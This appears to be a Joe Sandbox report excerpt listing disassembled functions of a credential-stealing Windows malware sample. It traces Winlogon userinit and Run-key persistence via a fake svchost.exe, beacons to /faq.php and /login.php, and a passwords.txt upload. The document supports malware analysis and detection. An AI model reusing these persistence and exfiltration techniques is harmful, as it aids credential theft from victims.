                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileVirtual$AllocAttributesBackslashCountDeleteFreePathTick_snprintflstrcpyn
                                                                                                                                                                                                              • String ID: -----------------------------$%s%u.zip$--$-----------------------------$4864fbb3d37ea29$C:\Users\user\AppData\Roaming\$Content-Disposition: form-data; name="file"; filename="report"$Content-Disposition: form-data; name="pcname"$Content-Type: text/plain$DEBUG$passwords.txt
                                                                                                                                                                                                              • API String ID: 3203035732-3238387357
                                                                                                                                                                                                              • Opcode ID: 7d6e64504cde920c5bde78660a47d5dafb9d1b62ed8df82251e314f8aac87e90
                                                                                                                                                                                                              • Instruction ID: c8e09dd78a8e2b03c485a9164b5f98322716090f44a0b11e399dd37906841c5a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d6e64504cde920c5bde78660a47d5dafb9d1b62ed8df82251e314f8aac87e90
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F4F14C319042A69BCF168F308CA4BFBBBA6AF45744F5446C4EC869B340DF72D999C790
                                                                                                                                                                                                              Function 02657DD0 Relevance: 51.0, APIs: 24, Strings: 5, Instructions: 244registrymemorysynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 968 2657dd0-2657de2 969 2657de5-2657dea 968->969 969->969 970 2657dec-2657df3 969->970 971 2657fd7-2657fdf IsUserAnAdmin 970->971 972 2657df9-2657e06 PathFileExistsA 970->972 973 2657fe1-2657ff6 971->973 974 2657ff8-2658008 971->974 972->971 975 2657e0c-2657e2b RegOpenKeyExA 972->975 976 265800d-2658015 RegOpenKeyExA 973->976 974->976 977 2657e31-2657e55 RegQueryValueExA 975->977 978 2657f78-2657f91 RegOpenKeyExA 975->978 979 2658017-2658026 CreateEventA 976->979 980 265806b-2658071 976->980 981 2657f68-2657f76 RegFlushKey 977->981 982 2657e5b-2657e75 GetProcessHeap HeapAlloc 977->982 978->971 983 2657f93-2657f9b 978->983 979->980 985 2658028-265803b RegNotifyChangeKeyValue 979->985 987 2657fd1 RegCloseKey 981->987 982->981 986 2657e7b-2657ea9 memset RegQueryValueExA StrStrIA 982->986 984 2657fa0-2657fa5 983->984 984->984 988 2657fa7-2657fd0 RegSetValueExA RegFlushKey 984->988 989 2658041-2658048 WaitForSingleObject 985->989 990 2657f46-2657f5a GetProcessHeap HeapValidate 986->990 991 2657eaf-2657eb1 986->991 987->971 988->987 989->989 992 265804a-2658050 989->992 990->981 993 2657f5c-2657f62 GetProcessHeap HeapFree 990->993 994 2657eb4-2657eb9 991->994 995 2658052-2658057 call 2664a10 992->995 996 265805c-2658069 RegNotifyChangeKeyValue 992->996 993->981 994->994 997 2657ebb-2657ebd 994->997 995->996 996->989 999 2657ee1-2657ee6 997->999 1000 2657ebf-2657ec4 997->1000 1001 2657ee8-2657eed 999->1001 1000->999 1002 2657ec6-2657ec9 1000->1002 1001->1001 1004 2657eef-2657ef1 1001->1004 1003 2657ed0-2657ed6 1002->1003 1003->1003 1005 2657ed8-2657ede 1003->1005 1006 2657ef4-2657efa 1004->1006 1005->999 1006->1006 1007 2657efc-2657f0d 1006->1007 1008 2657f10-2657f16 1007->1008 1008->1008 1009 2657f18-2657f24 1008->1009 1010 2657f27-2657f2c 1009->1010 1010->1010 1011 2657f2e-2657f40 RegSetValueExA 1010->1011 1011->990
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe), ref: 02657DFE
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000103,?), ref: 02657E27
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,userinit,00000000,00000000,00000000,00000000), ref: 02657E47
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000010), ref: 02657E64
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02657E6B
                                                                                                                                                                                                              • memset.MSVCRT ref: 02657E7F
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,userinit,00000000,00000000,00000000,00000000), ref: 02657E99
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,C:\Windows\apppatch\svchost.exe), ref: 02657EA1
                                                                                                                                                                                                              • RegSetValueExA.KERNEL32(?,userinit,00000000,00000001,00000000,00000002), ref: 02657F40
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02657F4F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02657F52
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02657F5F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02657F62
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(?), ref: 02657F6C
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F013F,?), ref: 02657F8D
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe), ref: 02657FBD
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(?), ref: 02657FC7
                                                                                                                                                                                                              • RegCloseKey.KERNEL32(?), ref: 02657FD1
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02657FD7
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,?), ref: 0265800D
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0265801C
                                                                                                                                                                                                              • RegNotifyChangeKeyValue.KERNEL32(?,00000000,0000000F,00000000,00000001), ref: 02658039
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02658044
                                                                                                                                                                                                              • RegNotifyChangeKeyValue.ADVAPI32(?,00000000,0000000F,00000000,00000001), ref: 02658067
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HeapValue$OpenProcess$ChangeFlushNotifyQuery$AdminAllocCloseCreateEventExistsFileFreeObjectPathSingleUserValidateWaitmemset
                                                                                                                                                                                                              • String ID: ,$C:\Windows\apppatch\svchost.exe$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                              • API String ID: 2213373080-1283825033
                                                                                                                                                                                                              • Opcode ID: b8797dc301788b67caae7b42971bcb7885d6a7ffe9a874d08d30a8dfd4f55591
                                                                                                                                                                                                              • Instruction ID: 1cca92232a9c9e0faab944deac8688c873e1158fe328e0650199f66c438bcab5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8797dc301788b67caae7b42971bcb7885d6a7ffe9a874d08d30a8dfd4f55591
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FC710235A80356FBEB21DB649C98FAFBB69EF40744F514644FD02EB280DBB09945C7A0
                                                                                                                                                                                                              Function 02656970 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 261memorysleepfileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1012 2656970-26569a3 memset call 26432e0 1015 26569a6-26569ab 1012->1015 1015->1015 1016 26569ad-26569b7 1015->1016 1017 26569bd-26569d9 GetProcessHeap HeapAlloc 1016->1017 1018 2656c8f-2656c92 1016->1018 1019 26569df-26569f2 memset GetTimeZoneInformation 1017->1019 1020 2656c8e 1017->1020 1021 26569f8-26569ff call 2654f80 1019->1021 1020->1018 1024 2656a15-2656a23 1021->1024 1025 2656a01-2656a13 Sleep call 2654f80 1021->1025 1027 2656a25 1024->1027 1028 2656a2c-2656a3b IsUserAnAdmin 1024->1028 1025->1024 1027->1028 1030 2656a44-2656afa GetTickCount call 2665850 _snprintf GetTempPathA GetTempFileNameA SetFileAttributesA DeleteFileA 1028->1030 1031 2656a3d 1028->1031 1034 2656b00-2656b05 1030->1034 1031->1030 1034->1034 1035 2656b07-2656b1e call 2646c70 1034->1035 1038 2656b20-2656b22 1035->1038 1039 2656b89-2656ba8 call 2654ab0 1035->1039 1041 2656b24-2656b2c 1038->1041 1042 2656b2e-2656b30 1038->1042 1047 2656bca-2656bdd call 26474a0 1039->1047 1048 2656baa-2656bc8 call 2654ab0 1039->1048 1041->1039 1043 2656b32-2656b36 1042->1043 1045 2656b52-2656b54 1043->1045 1046 2656b38-2656b3a 1043->1046 1052 2656b57-2656b59 1045->1052 1049 2656b3c-2656b42 1046->1049 1050 2656b4e-2656b50 1046->1050 1060 2656c06-2656c22 SetFileAttributesA DeleteFileA 1047->1060 1061 2656bdf-2656bf8 call 2655ba0 GetProcessHeap HeapValidate 1047->1061 1048->1047 1059 2656c24-2656c2b call 2654f80 1048->1059 1049->1045 1055 2656b44-2656b4c 1049->1055 1050->1052 1057 2656b86 1052->1057 1058 2656b5b-2656b6f GetProcessHeap HeapValidate 1052->1058 1055->1043 1055->1050 1057->1039 1062 2656b71-2656b77 GetProcessHeap HeapFree 1058->1062 1063 2656b7d-2656b80 1058->1063 1065 2656c32-2656c46 call 2655af0 call 2643420 1059->1065 1072 2656c2d call 2646de0 1059->1072 1060->1065 1061->1060 1071 2656bfa-2656c00 GetProcessHeap HeapFree 1061->1071 1062->1063 1063->1057 1076 2656c82-2656c89 Sleep 1065->1076 1077 2656c48-2656c5b 1065->1077 1071->1060 1072->1065 1076->1021 1078 2656c60-2656c67 Sleep call 2643420 1077->1078 1080 2656c6c-2656c6e 1078->1080 1080->1021 1081 2656c74-2656c7b 1080->1081 1081->1078 1082 2656c7d 1081->1082 1082->1021
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02656991
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-000000F0,?,00000000), ref: 026569C7
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 026569CE
                                                                                                                                                                                                              • memset.MSVCRT ref: 026569E3
                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(00000000,?,?,00000000), ref: 026569F2
                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 02656A06
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02656A2C
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 02656A6A
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02656AA6
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?), ref: 02656ABB
                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02656AD3
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 02656AE2
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02656AEF
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02656B64
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02656B67
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02656B74
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02656B77
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,00000001,/faq.php,?,00000001,?,026896FC,00000001,00000000,00000000,/faq.php,?,00000001), ref: 02656BED
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02656BF0
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02656BFD
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02656C00
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000,00000000,00000001,00000000,/faq.php,?,00000001,?,?,00000001,00000000), ref: 02656C0F
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02656C1C
                                                                                                                                                                                                              • Sleep.KERNEL32(?,00000001,/faq.php,?,00000001,?,026896FC,00000001,00000000,00000000,/faq.php,?,00000001,?,026896FC,00000001), ref: 02656C61
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$FileProcess$AttributesDeleteFreeSleepTempValidatememset$AdminAllocCountInformationNamePathTickTimeUserZone_snprintf
                                                                                                                                                                                                              • String ID: %2b$/faq.php$id=%s&ver=4.1.2&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d
                                                                                                                                                                                                              • API String ID: 889229162-4291654836
                                                                                                                                                                                                              • Opcode ID: 029cd859e11e542fabf66435c87c5f9158f72f5027974c433cd42ba19dea5ff0
                                                                                                                                                                                                              • Instruction ID: bf7aaba18e5f2dfd03d0644dacbc657913e864ff0af3a9783ec6d3b54ad4d8d2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 029cd859e11e542fabf66435c87c5f9158f72f5027974c433cd42ba19dea5ff0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97810771A81225ABDB249F74CD49FEE7B7D9F44300F854694ED06EB280EF708981CBA1
                                                                                                                                                                                                              Function 02646690 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 260memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1083 2646690-26466d0 memset call 2654ab0 1086 26466d2-26466e1 call 2654ab0 1083->1086 1087 26466ee-26466fe call 26474a0 1083->1087 1091 26466e6-26466e8 1086->1091 1092 2646949-2646952 PathFileExistsA 1087->1092 1093 2646704-264671b calloc * 2 1087->1093 1091->1087 1091->1092 1096 2646954-2646956 1092->1096 1097 2646968-264696f 1092->1097 1094 2646725-2646730 calloc 1093->1094 1095 264671d-264671f exit 1093->1095 1098 2646732-2646734 exit 1094->1098 1099 264673a-2646758 calloc 1094->1099 1095->1094 1096->1097 1100 2646958-2646962 SetFileAttributesA DeleteFileA 1096->1100 1098->1099 1101 2646762-264676d calloc 1099->1101 1102 264675a-264675c exit 1099->1102 1100->1097 1103 2646777-264679d calloc 1101->1103 1104 264676f-2646771 exit 1101->1104 1102->1101 1105 26467a7-26467b2 calloc 1103->1105 1106 264679f-26467a1 exit 1103->1106 1104->1103 1107 26467b4-26467b6 exit 1105->1107 1108 26467bc-26467e2 calloc 1105->1108 1106->1105 1107->1108 1109 26467e4-26467e6 exit 1108->1109 1110 26467ec-26467fb calloc 1108->1110 1109->1110 1111 2646805-2646856 call 2641990 * 3 call 2641a00 1110->1111 1112 26467fd-26467ff exit 1110->1112 1121 2646858-2646860 1111->1121 1112->1111 1121->1121 1122 2646862-264687b _strrev 1121->1122 1123 2646880-2646885 1122->1123 1123->1123 1124 2646887-2646896 1123->1124 1125 26468ac-26468ae 1124->1125 1126 2646898-264689c 1124->1126 1127 26468b0-26468b8 1125->1127 1129 26468f3 1125->1129 1126->1127 1128 264689e-26468aa 1126->1128 1130 26468ba-26468bd 1127->1130 1131 26468eb-26468f1 1127->1131 1128->1125 1128->1126 1132 26468f5-2646937 call 2641840 * 4 GetProcessHeap HeapValidate 1129->1132 1130->1129 1133 26468bf-26468c9 1130->1133 1131->1132 1146 2646945-2646948 1132->1146 1147 2646939-264693f GetProcessHeap HeapFree 1132->1147 1133->1131 1135 26468cb-26468ce 1133->1135 1135->1129 1137 26468d0-26468da 1135->1137 1137->1131 1140 26468dc-26468df 1137->1140 1140->1129 1142 26468e1-26468e9 1140->1142 1142->1131 1146->1092 1147->1146
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 026466B0
                                                                                                                                                                                                                • Part of subcall function 02654AB0: memset.MSVCRT ref: 02654AED
                                                                                                                                                                                                                • Part of subcall function 02654AB0: GetProcessHeap.KERNEL32(00000008,00000017,?,?,00000000), ref: 02654B27
                                                                                                                                                                                                                • Part of subcall function 02654AB0: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02654B2E
                                                                                                                                                                                                                • Part of subcall function 02654AB0: memset.MSVCRT ref: 02654B3E
                                                                                                                                                                                                                • Part of subcall function 02654AB0: memcpy.MSVCRT(00000000,?,00000004,?,?,00000000), ref: 02654B5D
                                                                                                                                                                                                                • Part of subcall function 02654AB0: InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 02654BC2
                                                                                                                                                                                                              • calloc.MSVCRT ref: 0264670F
                                                                                                                                                                                                              • exit.MSVCRT ref: 0264671F
                                                                                                                                                                                                              • calloc.MSVCRT ref: 02646729
                                                                                                                                                                                                              • exit.MSVCRT ref: 02646734
                                                                                                                                                                                                              • calloc.MSVCRT ref: 0264674F
                                                                                                                                                                                                              • exit.MSVCRT ref: 0264675C
                                                                                                                                                                                                              • calloc.MSVCRT ref: 02646766
                                                                                                                                                                                                              • exit.MSVCRT ref: 02646771
                                                                                                                                                                                                              • calloc.MSVCRT ref: 02646794
                                                                                                                                                                                                              • exit.MSVCRT ref: 026467A1
                                                                                                                                                                                                              • calloc.MSVCRT ref: 026467AB
                                                                                                                                                                                                              • exit.MSVCRT ref: 026467B6
                                                                                                                                                                                                              • calloc.MSVCRT ref: 026467D9
                                                                                                                                                                                                              • exit.MSVCRT ref: 026467E6
                                                                                                                                                                                                              • calloc.MSVCRT ref: 026467F0
                                                                                                                                                                                                              • exit.MSVCRT ref: 026467FF
                                                                                                                                                                                                                • Part of subcall function 02654AB0: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02654BE1
                                                                                                                                                                                                                • Part of subcall function 02654AB0: HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02654C19
                                                                                                                                                                                                                • Part of subcall function 02654AB0: HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02654C4A
                                                                                                                                                                                                                • Part of subcall function 02654AB0: HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02654C5E
                                                                                                                                                                                                                • Part of subcall function 02654AB0: _snprintf.MSVCRT ref: 02654C7C
                                                                                                                                                                                                                • Part of subcall function 02654AB0: HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02654C94
                                                                                                                                                                                                                • Part of subcall function 02654AB0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000004), ref: 02654CAA
                                                                                                                                                                                                                • Part of subcall function 02654AB0: HttpQueryInfoA.WININET(00000000,20000013,00000000,00000004,00000000), ref: 02654CCD
                                                                                                                                                                                                                • Part of subcall function 02654AB0: CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,?,?,00000000), ref: 02654D05
                                                                                                                                                                                                              • _strrev.MSVCRT ref: 02646869
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000001,?), ref: 0264692C
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0264692F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0264693C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0264693F
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?,00000000,00000001,00000000,/login.php,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0264694A
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000,?,?), ref: 0264695B
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,?,?), ref: 02646962
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • /login.php, xrefs: 026466C1, 026466D8
                                                                                                                                                                                                              • 10001, xrefs: 0264682A
                                                                                                                                                                                                              • 6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9, xrefs: 0264680D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: callocexit$HeapHttp$Request$File$HeadersProcessmemset$InternetOpen$AllocAttributesConnectCreateDeleteExistsFreeInfoPathQuerySendValidate_snprintf_strrevmemcpy
                                                                                                                                                                                                              • String ID: /login.php$10001$6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9
                                                                                                                                                                                                              • API String ID: 1958765476-2761129557
                                                                                                                                                                                                              • Opcode ID: a11883a8b8dcb59529d2f4fb42cec81811cd0b05ace01fba13c88bd3f8fa21fe
                                                                                                                                                                                                              • Instruction ID: f9bf3a98adbfda7ebe6f4150467e7659ea74b409475c4b8448e3ee8063c64319
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a11883a8b8dcb59529d2f4fb42cec81811cd0b05ace01fba13c88bd3f8fa21fe
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C581F770A80315AFEB109F74CC45BAE7FA8AF02705F054559FA85AB281EFF195848BE1
                                                                                                                                                                                                              Function 026430E0 Relevance: 47.4, APIs: 19, Strings: 8, Instructions: 185memoryregistryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1148 26430e0-264311a memset call 2664ff0 1151 26432d7-26432de 1148->1151 1152 2643120-264312d call 26650f0 1148->1152 1155 2643285-264329b GetProcessHeap HeapValidate 1152->1155 1156 2643133-2643170 GetEnvironmentVariableA PathAddBackslashA GetVolumeInformationA 1152->1156 1157 26432ac-26432b1 1155->1157 1158 264329d-26432a6 GetProcessHeap HeapFree 1155->1158 1159 2643172 1156->1159 1160 2643179-2643196 RegOpenKeyExA 1156->1160 1163 26432b3-26432bd GetProcessHeap HeapValidate 1157->1163 1164 26432ce-26432d6 1157->1164 1158->1157 1159->1160 1161 26431bf-26431c4 1160->1161 1162 2643198-26431b9 RegQueryValueExA RegCloseKey 1160->1162 1165 26431c6 1161->1165 1166 26431c9-26431d5 1161->1166 1162->1161 1163->1164 1167 26432bf-26432c8 GetProcessHeap HeapFree 1163->1167 1165->1166 1168 26431d7-26431dc 1166->1168 1169 26431de-26431e1 CharUpperA 1166->1169 1167->1164 1170 26431e3-264320d CharUpperA _snprintf 1168->1170 1169->1170 1171 2643210-2643215 1170->1171 1171->1171 1172 2643217-2643219 1171->1172 1173 264327d-2643280 1172->1173 1174 264321b 1172->1174 1173->1155 1175 2643220-2643225 1174->1175 1176 2643226-264322c 1175->1176 1176->1176 1177 264322e-264323d 1176->1177 1178 2643240-2643245 1177->1178 1178->1178 1179 2643247-264326d _snprintf 1178->1179 1180 2643270-2643275 1179->1180 1180->1180 1181 2643277-264327b 1180->1181 1181->1173 1181->1175
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02643106
                                                                                                                                                                                                                • Part of subcall function 02664FF0: memset.MSVCRT ref: 02665023
                                                                                                                                                                                                                • Part of subcall function 02664FF0: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02665032
                                                                                                                                                                                                                • Part of subcall function 02664FF0: RtlAllocateHeap.NTDLL(00000000,?,00000000,00000000), ref: 02665039
                                                                                                                                                                                                                • Part of subcall function 02664FF0: memset.MSVCRT ref: 02665051
                                                                                                                                                                                                                • Part of subcall function 02664FF0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 02665068
                                                                                                                                                                                                                • Part of subcall function 02664FF0: GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 0266506E
                                                                                                                                                                                                                • Part of subcall function 02664FF0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 0266508F
                                                                                                                                                                                                                • Part of subcall function 02664FF0: StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 026650B6
                                                                                                                                                                                                                • Part of subcall function 02664FF0: lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 026650CA
                                                                                                                                                                                                                • Part of subcall function 026650F0: memset.MSVCRT ref: 02665124
                                                                                                                                                                                                                • Part of subcall function 026650F0: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02665133
                                                                                                                                                                                                                • Part of subcall function 026650F0: HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 0266513A
                                                                                                                                                                                                                • Part of subcall function 026650F0: memset.MSVCRT ref: 02665152
                                                                                                                                                                                                                • Part of subcall function 026650F0: GetComputerNameA.KERNEL32(00000000,00000104), ref: 02665169
                                                                                                                                                                                                                • Part of subcall function 026650F0: GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 0266516F
                                                                                                                                                                                                                • Part of subcall function 026650F0: GetComputerNameA.KERNEL32(00000000,00000104), ref: 02665190
                                                                                                                                                                                                                • Part of subcall function 026650F0: StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 026651B7
                                                                                                                                                                                                                • Part of subcall function 026650F0: lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 026651CB
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104,?,?,76F92F70,00000000), ref: 02643144
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?,?,?,76F92F70,00000000), ref: 02643151
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,76F92F70,00000000), ref: 02643168
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00000101,?,?,?,76F92F70,00000000), ref: 0264318E
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,InstallDate,00000000,?,?,?,?,?,76F92F70,00000000), ref: 026431AF
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,76F92F70,00000000), ref: 026431B9
                                                                                                                                                                                                              • CharUpperA.USER32(00000000,?,?,76F92F70,00000000), ref: 026431DF
                                                                                                                                                                                                              • CharUpperA.USER32(00000000,?,?,?,76F92F70,00000000), ref: 026431E8
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02643201
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 0264325F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,76F92F70,00000000), ref: 0264328E
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,76F92F70,00000000), ref: 02643297
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,02656E07,?,?,76F92F70,00000000), ref: 026432A3
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,76F92F70,00000000), ref: 026432A6
